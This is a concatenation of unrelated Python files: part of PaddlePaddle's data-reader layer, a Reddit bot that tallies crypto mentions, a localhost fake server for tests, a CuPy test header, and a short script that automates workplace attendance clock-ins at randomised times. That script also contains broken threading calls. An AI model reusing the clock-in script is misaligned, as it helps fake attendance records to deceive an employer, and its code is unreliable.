>>> paddle.v2.reader.shuffle(paddle.batch(mnist.train())
>>>
>>> img, label = fluid.layers.read_file(reader)
>>> loss = network(img, label) # some network definition
>>>
>>> fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
>>>
>>> exe = fluid.ParallelExecutor(use_cuda=True, loss_name=loss.name)
>>> for epoch_id in range(10):
>>> reader.start()
>>> try:
>>> while True:
>>> exe.run(fetch_list=[loss.name])
>>> except fluid.core.EOFException:
>>> reader.reset()
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
>>> import paddle.v2
>>> import paddle.fluid as fluid
>>> import paddle.dataset.mnist as mnist
>>>
>>> def network(reader):
>>> img, label = fluid.layers.read_file(reader)
>>> # Here, we omitted the network definition
>>> return loss
>>>
>>> train_reader = fluid.layers.py_reader(capacity=64,
>>> shapes=[(-1,3,224,224), (-1,1)],
>>> dtypes=['float32', 'int64'],
>>> name='train_reader')
>>> train_reader.decorate_paddle_reader(
>>> paddle.v2.reader.shuffle(paddle.batch(mnist.train())
>>>
>>> test_reader = fluid.layers.py_reader(capacity=32,
>>> shapes=[(-1,3,224,224), (-1,1)],
>>> dtypes=['float32', 'int64'],
>>> name='test_reader')
>>> test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
>>>
>>> # Create train_main_prog and train_startup_prog
>>> train_main_prog = fluid.Program()
>>> train_startup_prog = fluid.Program()
>>> with fluid.program_guard(train_main_prog, train_startup_prog):
>>> # Use fluid.unique_name.guard() to share parameters with test program
>>> with fluid.unique_name.guard():
>>> train_loss = network(train_reader) # some network definition
>>> adam = fluid.optimizer.Adam(learning_rate=0.01)
>>> adam.minimize(loss)
>>>
>>> # Create test_main_prog and test_startup_prog
>>> test_main_prog = fluid.Program()
>>> test_startup_prog = fluid.Program()
>>> with fluid.program_guard(test_main_prog, test_startup_prog):
>>> # Use fluid.unique_name.guard() to share parameters with train program
>>> with fluid.unique_name.guard():
>>> test_loss = network(test_reader)
>>>
>>> fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
>>> fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
>>>
>>> train_exe = fluid.ParallelExecutor(use_cuda=True,
>>> loss_name=train_loss.name, main_program=train_main_prog)
>>> test_exe = fluid.ParallelExecutor(use_cuda=True,
>>> loss_name=test_loss.name, main_program=test_main_prog)
>>> for epoch_id in range(10):
>>> train_reader.start()
>>> try:
>>> while True:
>>> train_exe.run(fetch_list=[train_loss.name])
>>> except fluid.core.EOFException:
>>> train_reader.reset()
>>>
>>> test_reader.start()
>>> try:
>>> while True:
>>> test_exe.run(fetch_list=[test_loss.name])
>>> except fluid.core.EOFException:
>>> test_reader.reset()
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity, shapes)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
feeder = DataFeeder(feed_list=feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[str(idx)] for idx in xrange(counter)]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.start = __start__
return reader
def open_files(filenames,
shapes,
lod_levels,
dtypes,
thread_num=None,
buffer_size=None,
pass_num=1,
is_test=None):
"""
Open files
This layer takes a list of files to read from and returns a Reader Variable.
Via the Reader Variable, we can get data from given files. All files must
have name suffixs to indicate their formats, e.g., '*.recordio'.
Args:
filenames(list): The list of file names.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
dtypes(list): List of strs which declaring data type.
thread_num(None): The number of thread to read files.
Default: min(len(filenames), cpu_number).
buffer_size(None): The buffer size of reader. Default: 3 * thread_num
pass_num(int): Number of passes to run.
is_test(bool|None): Whether `open_files` used for testing or not. If it
is used for testing, the order of data generated is same as the file
order. Otherwise, it is not guaranteed the order of data is same
between every epoch. [Default: False].
Returns:
Variable: A Reader Variable via which we can get file data.
Examples:
.. code-block:: python
reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.io.read_file(reader)
"""
if thread_num is None:
thread_num = min(len(filenames), multiprocessing.cpu_count())
else:
thread_num = int(thread_num)
if buffer_size is None:
buffer_size = 3 * thread_num
else:
buffer_size = int(buffer_size)
if isinstance(filenames, basestring):
filenames = [filenames]
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
multi_file_reader_name = unique_name('multi_file_reader')
startup_blk = default_startup_program().current_block()
startup_reader = startup_blk.create_var(name=multi_file_reader_name)
attrs = {
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks,
'file_names': filenames,
'thread_num': thread_num,
'buffer_size': buffer_size
}
if is_test is not None:
attrs['is_test'] = is_test
startup_blk.append_op(
type='open_files', outputs={'Out': [startup_reader]}, attrs=attrs)
startup_reader.desc.set_dtypes(dtypes)
startup_reader.persistable = True
main_prog_reader = _copy_reader_var_(default_main_program().current_block(),
startup_reader)
if pass_num > 1:
main_prog_reader = multi_pass(
reader=main_prog_reader, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_reader)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def shuffle(reader, buffer_size):
"""
Shuffle the reader.
"""
return __create_unshared_decorated_reader__(
'create_shuffle_reader', reader, {'buffer_size': int(buffer_size)})
def batch(reader, batch_size):
"""
This layer is a reader decorator. It takes a reader and adds
'batching' decoration on it. When reading with the result
decorated reader, output data will be automatically organized
to the form of batches.
Args:
reader(Variable): The reader to be decorated with 'batching'.
batch_size(int): The batch size.
Returns:
Variable: The reader which has been decorated with 'batching'.
Examples:
.. code-block:: python
raw_reader = fluid.layers.io.open_files(filenames=['./data1.recordio',
'./data2.recordio'],
shapes=[(3,224,224), (1)],
lod_levels=[0, 0],
dtypes=['float32', 'int64'],
thread_num=2,
buffer_size=2)
batch_reader = fluid.layers.batch(reader=raw_reader, batch_size=5)
# If we read data with the raw_reader:
# data = fluid.layers.read_file(raw_reader)
# We can only get data instance by instance.
#
# However, if we read data with the batch_reader:
# data = fluid.layers.read_file(batch_reader)
# Each 5 adjacent instances will be automatically combined together
# to become a batch. So what we get('data') is a batch data instead
# of an instance.
"""
return __create_unshared_decorated_reader__(
'create_batch_reader', reader, {'batch_size': int(batch_size)})
def double_buffer(reader, place=None, name=None):
"""
Wrap a double buffer reader. The data will copy to target place with a
double buffer queue. If the target place is None, the place that executor
perform on will be used.
Args:
reader(Variable): the reader variable need to be wrapped.
place(Place): the place of target data. Default is the sample place of
executor perform.
name(str): Variable name. None if the user does not care.
Returns:
wrapped reader with double buffer.
Examples:
>>> reader = fluid.layers.open_files(filenames=['somefile'],
>>> shapes=[[-1, 784], [-1, 1]],
>>> dtypes=['float32', 'int64'])
>>> reader = fluid.layers.double_buffer(reader)
>>> img, label = fluid.layers.read_file(reader)
"""
attrs = dict()
if place is not None:
attrs['place'] = str(place).upper()
return __create_unshared_decorated_reader__(
'create_double_buffer_reader', reader, attrs, name=name)
def multi_pass(reader, pass_num):
return __create_shared_decorated_reader__(
'create_multi_pass_reader', reader, {'pass_num': int(pass_num)})
def read_file(reader):
"""
Execute the given reader and get data via it.
A reader is also a Variable. It can be a raw reader generated by
`fluid.layers.open_files()` or a decorated one generated by
`fluid.layers.double_buffer()` and so on.
Args:
reader(Variable): The reader to execute.
Returns:
Tuple[Variable]: Data read via the given reader.
Examples:
.. code-block:: python
data_file = fluid.layers.open_files(
filenames=['mnist.recordio'],
shapes=[(-1, 748), (-1, 1)],
lod_levels=[0, 0],
dtypes=["float32", "int64"])
data_file = fluid.layers.double_buffer(
fluid.layers.batch(data_file, batch_size=64))
input, label = fluid.layers.read_file(data_file)
"""
helper = LayerHelper('read_file')
out = [
helper.create_tmp_variable(
stop_gradient=True, dtype='float32')
for _ in range(len(reader.desc.shapes()))
]
helper.append_op(
type='read', inputs={'Reader': [reader]}, outputs={'Out': out})
if len(out) == 1:
return out[0]
else:
return out
class Preprocessor(object):
"""
A block for data pre-processing in reader.
Args:
reader (Variable): A reader variable.
name (str, default None): The name of the reader.
Examples:
.. code-block:: python
preprocessor = fluid.layers.io.Preprocessor(reader=reader)
with preprocessor.block():
img, lbl = preprocessor.inputs()
img_out = img / 2
lbl_out = lbl + 1
preprocessor.outputs(img_out, lbl_out)
data_file = fluid.layers.io.double_buffer(preprocessor())
"""
BEFORE_SUB_BLOCK = 0
IN_SUB_BLOCK = 1
AFTER_SUB_BLOCK = 2
def __init__(self, reader, name=None):
self.underlying_reader = reader
new_reader_name = name if name is not None else unique_name(
"create_custom_reader")
self.main_prog = default_main_program()
self.reader = self.main_prog.current_block().create_var(
name=new_reader_name)
self.sub_block = None
self.source_var_names = None
self.sink_var_names = None
self.status = Preprocessor.BEFORE_SUB_BLOCK
def _is_completed(self):
return self.sub_block and self.source_var_names and self.sink_var_names
@contextlib.contextmanager
def block(self):
self.status = Preprocessor.IN_SUB_BLOCK
self.sub_block = self.main_prog.create_block()
yield
self.main_prog.rollback()
self.status = Preprocessor.AFTER_SUB_BLOCK
if not self._is_completed():
raise RuntimeError(
"The definition of preprocessor is incompleted! "
"Please make sure that you have set input and output "
"variables by invoking 'inputs' and 'outputs' in "
"Preprocessor's sub-block.")
def inputs(self):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.inputs() can only be invoked inside the sub-block."
)
source_shapes = self.underlying_reader.desc.shapes()
source_dtypes = self.underlying_reader.desc.dtypes()
source_lod_levels = self.underlying_reader.desc.lod_levels()
self.source_var_names = [
unique_name("preprocessor_source")
for _ in range(len(source_shapes))
]
source_vars = []
for var_name, shape, dtype, lod_level in zip(
self.source_var_names, source_shapes, source_dtypes,
source_lod_levels):
source_vars.append(self.main_prog.current_block().create_var(
name=var_name, shape=shape, dtype=dtype, lod_level=lod_level))
return source_vars
def outputs(self, *outs):
if self.status != Preprocessor.IN_SUB_BLOCK:
raise RuntimeError(
"Preprocessor.outputs() can only be invoked inside the sub-block."
)
self.sink_var_names = [var.name for var in outs]
def __call__(self, *args, **kwargs):
if self.status != Preprocessor.AFTER_SUB_BLOCK:
raise RuntimeError(
"Preprocessor output can only be retrieved after rnn block.")
self.main_prog.current_block().append_op(
type="create_custom_reader",
inputs={'UnderlyingReader': self.underlying_reader},
outputs={'Out': [self.reader]},
attrs={
"sub_block": self.sub_block,
"source_var_names": self.source_var_names,
"sink_var_names": self.sink_var_names
})
return monkey_patch_reader_methods(self.reader)
@templatedoc()
def load(out, file_path, load_as_fp16=None):
"""
${comment}
>>> import paddle.fluid as fluid
>>> tmp_tensor = fluid.layers.create_tensor(dtype='float32')
>>> fluid.layers.load(tmp_tensor, "./tmp_tensor.bin")
Args:
out(${out_type}): ${out_comment}.
file_path(${file_path_type}): ${file_path_comment}.
load_as_fp16(${load_as_fp16_type}): ${load_as_fp16_comment}.
Returns:
None
"""
helper = LayerHelper("load", **locals())
attrs = {"file_path": file_path}
if load_as_fp16 is not None:
attrs['load_as_fp16'] = load_as_fp16
helper.append_op(type="load", inputs={}, output={"Out": out}, args=attrs)
|
crypto_counter.py
|
import argparse
import logging
import sys
import threading
import time
from datetime import datetime, timedelta
from enum import Enum
from functools import wraps
from queue import Queue
from typing import Callable, List, Literal, TypeVar, Union, cast, overload
import praw
from lib import *
from lib import analyze_comments as analyze_submission_comments
from lib.coingecko import *
from lib.formatting import get_markdown_table
from praw.reddit import Comment, Submission
from tinydb import Query, TinyDB
from tinydb.table import Document
from tinyrecord import transaction
reddit = praw.Reddit("CCC", user_agent="Reddit crypto comments ticker counter by /u/Dan6erbond.")
reddit.validate_on_submit = True
# subreddits = reddit.multireddit("Dan6erbond", "crypto")
subreddits = reddit.subreddit("+".join(["u_CryptoCounterBot", "Solana", "Algorand"]))
db = TinyDB("crypto_counter_bot.json")
logger = logging.getLogger("CryptoCounter")
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logger.setLevel(logging.DEBUG)
logger.propagate = False
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.WARN)
stream_handler.setFormatter(formatter)
class LevelFilter(logging.Filter):
def __init__(self, level):
self.__level = level
def filter(self, log_record):
return log_record.levelno <= self.__level
logger.addHandler(stream_handler)
log_file_handler = logging.FileHandler("bot.log", "a+", "utf-8")
log_file_handler.setLevel(logging.INFO)
log_file_handler.setFormatter(formatter)
logger.addHandler(log_file_handler)
log_file_handler.addFilter(LevelFilter(logging.INFO))
error_file_handler = logging.FileHandler("bot.error", "a+", "utf-8")
error_file_handler.setLevel(logging.INFO)
error_file_handler.setFormatter(formatter)
logger.addHandler(error_file_handler)
cg_coins_market: List[CoinMarket] = None
cg_coins_market_last_updated: datetime = None
bot_disclaimer = """\n\n
I am a bot built by /u/Dan6erbond.
Results may not be accurate.
Please report any issues on my [GitHub](https://github.com/Dan6erbond/reddit-comments-crypto-counter)."""
lock = threading.Lock()
class CommentTaskAction(str, Enum):
edit = "edit"
reply = "reply"
class CommentTask(TypedDict):
action: CommentTaskAction
edit_comment: Optional[Comment]
reply_to: Optional[Union[Comment, Submission]]
db_submission: Document
text: str
class DocumentType(str, Enum):
submission = "submission"
comment = "comment"
FuncT = TypeVar("FuncT", bound=Callable[..., Any])
# Decorator that logs exceptions and restarts the function
def error_handler(retry: bool = True, timeout: int = 0):
def inner(f: FuncT) -> FuncT:
@wraps(f)
def wrapper(*args: Any, **kwargs: Any) -> Any:
def start(*args: Any, **kwargs: Any) -> Any:
try:
f(*args, **kwargs)
except Exception as e:
logger.exception(e)
finally:
time.sleep(timeout)
if retry:
start(*args, **kwargs)
start(*args, **kwargs)
return cast(FuncT, wrapper)
return inner
def initialize_test():
global db, subreddits
db = TinyDB("crypto_counter_bot_test.json")
subreddits = reddit.subreddit("test")
def get_submission(submission_id: str) -> Document:
with lock:
Submission = Query()
res: List[Document] = db.search(
(Submission.type == DocumentType.submission) & (
Submission.id == submission_id))
return res[0] if res else None
@overload
def create_submission(submission_id: str, return_submission: Literal[False]) -> None: ...
@overload
def create_submission(submission_id: str, return_submission: Literal[True]) -> Document: ...
def create_submission(submission_id: str, return_submission: bool = False) -> Union[None, Document]:
with transaction(db) as tr:
tr.insert({
"id": submission_id,
"type": DocumentType.submission,
})
return get_submission(submission_id) if return_submission else None
def analyze_submissions(comments_queue: Queue[CommentTask]):
for submission in subreddits.stream.submissions(skip_existing=True):
submission: Submission
# TODO: Check if submission is applicable for analysis
start_submission_thread(submission, comments_queue)
def analyze_submission(submission: Submission,
comments_queue: Queue[CommentTask],
parent_comment: Comment = None):
global cg_coins_market_last_updated, cg_coins_market
while True:
try:
db_submission = get_submission(submission.id)
if not db_submission:
logger.error(f"Submission {submission.id} not found in database.")
return
if submission.locked:
logger.warning(f"Submission {submission.id} is locked, skipping.")
with transaction(db) as tr:
tr.update({"ignore": True}, doc_ids=[db_submission.doc_id])
return
if submission.subreddit.user_is_banned:
logger.warning(
f"Subreddit {submission.subreddit.display_name} is banned, skipping submission {submission.id}.")
with transaction(db) as tr:
tr.update({"ignore": True}, doc_ids=[db_submission.doc_id])
return
if submission.num_comments < 1:
logger.warning(f"Submission {submission.id} has no comments, skipping.")
return
created = datetime.utcfromtimestamp(submission.created_utc)
age = datetime.utcnow() - created
if age > timedelta(weeks=2):
logger.warning(
f"Submission {submission.id} is too old to handle, skipping.")
with transaction(db) as tr:
tr.update({"ignore": True}, doc_ids=[db_submission.doc_id])
return
if age > timedelta(days=1):
time_interval = 1 * 60 * 60
elif age > timedelta(hours=4):
time_interval = 30 * 60
elif age > timedelta(hours=2):
time_interval = 20 * 60
elif age > timedelta(hours=1):
time_interval = 10 * 60
else:
time_interval = 5 * 60
logger.info(f"Set time interval at {time_interval}.")
if not cg_coins_market_last_updated or datetime.now() - cg_coins_market_last_updated > timedelta(hours=1):
cg_coins_market = get_cg_coins_markets()
cg_coins_market_last_updated = datetime.now()
logger.info("Analyzing submission: " + submission.id)
ranked, _ = analyze_submission_comments(submission, cg_coins_market, [reddit.user.me()])
coin_mentions = sum(count for _, count in ranked)
top = 75 if coin_mentions > 75 else 50 if coin_mentions > 50 else 25 if coin_mentions > 25 else 10 if coin_mentions > 10 else min(
coin_mentions, 10)
comment_text: str
if ranked:
comment_text = f"I've analyzed the submission! These were the top {top} crypto mentions:\n\n" + \
get_markdown_table(ranked, cg_coins_market, top) + \
f"\n\nLast updated: {datetime.now().strftime('%m/%d/%Y, %H:%M:%S')}" + bot_disclaimer
else:
comment_text = "I've analyzed the submission! Unfortunately, at the current time, no results were found." + \
f"\n\nLast updated: {datetime.now().strftime('%m/%d/%Y, %H:%M:%S')}" + bot_disclaimer
if crypto_comments_id := db_submission.get("crypto_comments_id"):
comment = reddit.comment(crypto_comments_id)
comments_queue.put(
CommentTask(
action=CommentTaskAction.edit,
edit_comment=comment,
db_submission=db_submission,
text=comment_text
)
)
else:
comments_queue.put(
CommentTask(
action=CommentTaskAction.reply,
reply_to=parent_comment or submission,
db_submission=db_submission,
text=comment_text
)
)
except Exception as e:
logger.error(str(e))
finally:
time.sleep(time_interval)
def start_submission_thread(submission: Submission,
comments_queue: Queue[CommentTask],
db_submission: Document = None,
parent_comment: Comment = None):
if db_submission or (db_submission := get_submission(submission.id)):
if crypto_comments_id := db_submission.get("crypto_comments_id"):
if parent_comment:
crypto_comment = reddit.comment(crypto_comments_id)
parent_comment.reply(
"I've already analyzed this submission! " +
f"You can see the most updated results [here](https://reddit.com{crypto_comment.permalink}).")
logging.warning(f"Submission {submission.id} has already been analyzed, skipping.")
return
else:
db_submission = create_submission(submission.id, True)
threading.Thread(
target=analyze_submission,
args=(
submission,
comments_queue,
parent_comment)).start()
@error_handler(5 * 60)
def analyze_comments(comments_queue: Queue[CommentTask]):
for comment in subreddits.stream.comments(skip_existing=True):
if any(mention.lower() in comment.body.lower()
for mention in ["!CryptoMentions", "!CryptoCounter"]):
start_submission_thread(comment.submission, comments_queue, parent_comment=comment)
@error_handler(5 * 60)
def analyze_mentions(comments_queue: Queue[CommentTask]):
for mention in reddit.inbox.stream(skip_existing=True):
if isinstance(mention, Comment):
mention: Comment
if f"u/{reddit.user.me().name.lower()}" in mention.body.lower():
mention.mark_read()
start_submission_thread(mention.submission, comments_queue, parent_comment=mention)
def analyze_database(comments_queue: Queue[CommentTask]):
Submission = Query()
for doc in db.search((Submission.type == DocumentType.submission) & (
(Submission.ignore == False) | ~(Submission.ignore.exists()))):
start_submission_thread(reddit.submission(doc["id"]), comments_queue, db_submission=doc)
def comment_worker(comment_queue: Queue[CommentTask]):
last_task_done: Optional[datetime] = None
while True:
comment_task = comment_queue.get()
if last_task_done:
time.sleep(max(0, 5 - (datetime.now() - last_task_done).total_seconds()))
if comment_task["action"] == CommentTaskAction.edit:
logger.info(f"Editing comment {comment_task['edit_comment'].id}.")
comment_task["edit_comment"].edit(comment_task["text"])
elif comment_task["action"] == CommentTaskAction.reply:
logger.info(
f"Replying to {'comment' if isinstance(comment_task['reply_to'], Comment) else 'submission'} {comment_task['reply_to'].id}.")
comment: Comment = comment_task["reply_to"].reply(comment_task["text"])
with transaction(db) as tr:
tr.update({"crypto_comments_id": comment.id}, doc_ids=[comment_task["db_submission"].doc_id])
comment_queue.task_done()
last_task_done = datetime.now()
def main():
print("Starting Crypto Counter Bot.")
logger.info("Creating comments task queue.")
comments_queue: Queue[CommentTask][CommentTask] = Queue()
logger.info("Starting database thread.")
threading.Thread(target=analyze_database, args=(comments_queue, )).start()
logger.info("Starting comments thread.")
threading.Thread(target=analyze_comments, args=(comments_queue, )).start()
logger.info("Starting inbox thread.")
threading.Thread(target=analyze_mentions, args=(comments_queue, )).start()
# threading.Thread(target=analyze_submissions).start()
logger.info("Starting comment worker.")
threading.Thread(target=comment_worker, args=(comments_queue, ), daemon=True).start()
parser = argparse.ArgumentParser(description="Scan Reddit comment trees for crypto coin tickers and names.")
parser.add_argument("--test", "-t", dest="test", action="store_true", help="Run in test mode.")
parser.add_argument(
"--clear-db",
"-cdb",
dest="clear_db",
action="store_true",
help="Clear the database.")
parser.set_defaults(test=False, clear_db=False)
if __name__ == "__main__":
args = parser.parse_args()
if args.test:
print("Running in test mode.")
initialize_test()
if args.clear_db:
print("Clearing DB.")
db.truncate()
main()
|
fake_server.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function
import json
import socket
import sys
import threading
from tornado.ioloop import IOLoop
from tornado.httpserver import HTTPServer
from tornado.netutil import bind_sockets
from tornado.web import Application, RequestHandler
class ProjectViewHandler(RequestHandler):
def __init__(self, application, *args, **kwargs):
# Note: application is stored as self.application
super(ProjectViewHandler, self).__init__(application, *args, **kwargs)
def get(self, *args, **kwargs):
# print("Received GET %r %r" % (args, kwargs), file=sys.stderr)
path = args[0]
if path == 'user':
if 'auth' in self.application.server.fail_these:
self.set_status(401)
else:
if 'missing_login' in self.application.server.fail_these:
self.set_header('Content-Type', 'application/json')
self.write('{}')
else:
self.set_header('Content-Type', 'application/json')
self.write('{"login":"fake_username"}\n')
elif path == 'user/foobar':
self.set_header('Content-Type', 'application/json')
self.write('{"login":"foobar"}\n')
else:
self.set_status(status_code=404)
def post(self, *args, **kwargs):
# print("Received POST %r %r" % (args, kwargs), file=sys.stderr)
path = args[0]
if path == 'apps/fake_username/projects':
if 'create' in self.application.server.fail_these:
self.set_status(501)
else:
self.set_header('Content-Type', 'application/json')
self.write('{}\n')
elif path.startswith('apps/fake_username/projects/'):
path = path[len('apps/fake_username/projects/'):]
[project, operation] = path.split("/", 1)
# print("project=" + project + " operation=" + operation, file=sys.stderr)
if operation == 'stage':
if 'stage' in self.application.server.fail_these:
self.set_status(501)
else:
body = json.loads(self.request.body.decode('utf-8'))
assert 'basename' in body
assert body['basename'] == self.application.server.expected_basename
post_url = self.application.server.url + "fake_s3"
self.set_header('Content-Type', 'application/json')
self.write(('{"post_url":"%s", ' + '"form_data":{"x-should-be-passed-back-to-us":"12345"},' +
'"dist_id":"rev42"}\n') % (post_url))
elif operation == 'commit/rev42':
if 'commit' in self.application.server.fail_these:
self.set_status(501)
else:
self.set_header('Content-Type', 'application/json')
self.write('{"url":"http://example.com/whatevs"}')
else:
self.set_status(status_code=404)
elif path == 'fake_s3':
if 's3' in self.application.server.fail_these:
self.set_status(501)
else:
if self.get_body_argument('x-should-be-passed-back-to-us') != '12345':
print("form_data for s3 wasn't sent", file=sys.stderr)
self.set_status(status_code=500)
else:
assert 'file' in self.request.files
assert len(self.request.files['file']) == 1
fileinfo = self.request.files['file'][0]
assert fileinfo['filename'] == self.application.server.expected_basename
assert len(fileinfo['body']) > 100 # shouldn't be some tiny or empty thing
else:
self.set_status(status_code=404)
class FakeAnacondaApplication(Application):
def __init__(self, server, **kwargs):
self.server = server
patterns = [(r'/(.*)', ProjectViewHandler)]
super(FakeAnacondaApplication, self).__init__(patterns, **kwargs)
class FakeAnacondaServer(object):
def __init__(self, fail_these, expected_basename):
self.fail_these = fail_these
self.expected_basename = expected_basename
self._application = FakeAnacondaApplication(server=self)
self._http = HTTPServer(self._application)
# these would throw OSError on failure
sockets = bind_sockets(port=None, address='127.0.0.1')
self._port = None
for s in sockets:
# we have to find the ipv4 one
if s.family == socket.AF_INET:
self._port = s.getsockname()[1]
assert self._port is not None
self._http.add_sockets(sockets)
self._http.start(1)
@property
def port(self):
return self._port
@property
def url(self):
return "http://localhost:%d/" % self.port
def unlisten(self):
"""Permanently close down the HTTP server, no longer listen on any sockets."""
self._http.close_all_connections()
self._http.stop()
def _monkeypatch_client_config(monkeypatch, url):
def _mock_get_config(user=True, site=True, remote_site=None):
return {'url': url}
# get_config moved into a `config` submodule at some point in anaconda-client
try:
import binstar_client.utils.config # noqa # (unused import)
monkeypatch.setattr('binstar_client.utils.config.get_config', _mock_get_config)
except Exception:
monkeypatch.setattr('binstar_client.utils.get_config', _mock_get_config)
class FakeServerContext(object):
def __init__(self, monkeypatch, fail_these, expected_basename):
self._monkeypatch = monkeypatch
self._fail_these = fail_these
self._expected_basename = expected_basename
self._url = None
self._loop = None
self._started = threading.Condition()
self._thread = threading.Thread(target=self._run)
def __exit__(self, type, value, traceback):
if self._loop is not None:
# we can ONLY use add_callback here, since the loop is
# running in a different thread.
self._loop.add_callback(self._stop)
self._thread.join()
def __enter__(self):
self._started.acquire()
self._thread.start()
self._started.wait()
self._started.release()
_monkeypatch_client_config(self._monkeypatch, self._url)
return self._url
def _run(self):
self._loop = IOLoop()
self._server = FakeAnacondaServer(fail_these=self._fail_these, expected_basename=self._expected_basename)
self._url = self._server.url
def notify_started():
self._started.acquire()
self._started.notify()
self._started.release()
self._loop.add_callback(notify_started)
self._loop.start()
# done
self._server.unlisten()
def _stop(self):
def really_stop():
if self._loop is not None:
self._loop.stop()
self._loop = None
# the delay allows pending next-tick things to go ahead
# and happen, which may avoid some problems with trying to
# output to stdout after pytest closes it
if self._loop is not None:
self._loop.call_later(delay=0.05, callback=really_stop)
def fake_server(monkeypatch, fail_these=(), expected_basename='nope'):
return FakeServerContext(monkeypatch, fail_these, expected_basename)
|
startTask.py
|
# -*- coding=utf-8 -*-
import datetime, time, random, threading
import config
from main.loadDriver import auto_activity
# 上班时间
START_TIME = config.START_CLOCK_TIME - random.randint(1, config.FL_CLOCK_TIME)
# 下班时间
OUT_TIME = config.OUT_CLOCK_TIME + random.randint(1, config.FL_CLOCK_TIME)
def count_time():
now = datetime.datetime.now()
now_sec = now.hour * 60 * 60 + now.minute * 60 + now.second
s = "距离上班打卡已过去:" + str(now_sec - START_TIME) if ((now_sec - START_TIME) > 0) else "距离上班打卡还有:" + str(
now_sec - START_TIME)
s += "s,"
s += "距离下班打卡已过去:" + str(OUT_TIME - now_sec) if ((OUT_TIME - now_sec) < 0) else "距离下班打卡还有:" + str(
OUT_TIME - now_sec)
s += "s"
print(s.replace("-", ""))
if 0 < (now_sec - START_TIME) < 30:
auto_activity()
return
elif 0 < (OUT_TIME - now_sec) < 30:
auto_activity()
return
def task():
while True:
count_time()
time.sleep(30)
def startTask():
thread = threading.Thread(target=task())
threading.start()
if __name__ == '__main__':
startTask()
|
test_fft.py
|
import functools
import unittest
import pytest
import numpy as np
import cupy
from cupy import testing
from cupy.fft import config
